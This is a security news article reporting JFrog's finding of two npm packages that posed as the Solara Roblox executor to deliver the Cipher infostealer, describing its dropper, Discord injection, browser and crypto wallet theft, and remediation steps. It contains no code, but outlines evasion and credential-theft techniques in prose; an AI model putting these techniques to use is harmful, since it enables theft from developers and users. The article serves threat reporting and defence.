Malicious npm Campaign Impersonates Solara Executor to Steal Discord and Crypto Wallet Data

A recent cybersecurity threat has emerged from the npm ecosystem, where attackers successfully hid a sophisticated information stealer inside seemingly harmless packages.

On March 12, 2026, JFrog security researchers Guy Korolevski and Meitar Palas reported the discovery of two malicious packages designed to deliver the Cipher infostealer.

By masquerading as a Roblox script executor named “Solara,” the malware targets Windows environments to quietly harvest Discord credentials, browser data, and cryptocurrency wallets.

The campaign relied on two npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, which have since been removed.

These packages used pre-install scripts to download a Windows executable from Dropbox. When uploaded to VirusTotal, the executable bypassed almost all static and heuristic antivirus scanners because it functioned simply as a dropper.

Inside, the dropper concealed a 321MB archive containing obfuscated JavaScript, a full Node.js environment, and an embedded Python script.

By avoiding traditional malware signatures and hiding the true payload inside a clean outer layer, the attackers successfully evaded immediate detection.

The payload also included elevate.exe, a legitimate tool that could be abused to execute commands with higher system privileges.​

Discord Client Injection

The Cipher stealer prioritizes compromising Discord accounts by disabling built-in security features and modifying client files.

The malware patches BetterDiscord’s core files to neutralize webhook protections, ensuring that stolen credentials reach the attacker’s server without being blocked.

For the official Discord app, the JavaScript downloads an additional payload from a live GitHub repository.

The injected script forces users to log out, subsequently capturing their credentials, two-factor authentication codes, and credit card details upon their next login.

To maintain persistence, the malware modifies Discord’s installation files, ensuring the malicious script runs automatically every time the application launches.​

Browser and Crypto Wallet Theft

Beyond Discord, the malware conducts a massive sweep of the victim’s system for sensitive data. If Python is not installed on the system, the malware silently downloads and installs it to ensure the theft is successful.

It accesses local databases for Chrome, Edge, Brave, Opera, and Yandex to steal passwords, cookies, autofill data, and browsing history, as reported by JFrog.​

Simultaneously, the script hunts for wallet files associated with Bitcoin, Ethereum, Exodus, Electrum, and several other digital currencies.

The malware actively attempts to decrypt Exodus wallet seed files using local libraries. All collected data is then moved to a temporary staging directory, compressed into a ZIP file, and exfiltrated to the attacker via file-sharing services or a command-and-control server.​

Mitigations and Response

While the npm packages and Dropbox links have been neutralized, users who may have been exposed should take immediate remediation steps:​

• Perform a clean reinstallation of the Discord desktop application and remove the malicious npm packages from all development environments.
• Rotate all compromised passwords, Discord tokens, and session cookies immediately.
• Verify the security of all cryptocurrency wallets and transfer funds if exposed.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Malicious npm Campaign Impersonates Solara Executor to Steal Discord and Crypto Wallet Data appeared first on Cyber Security News.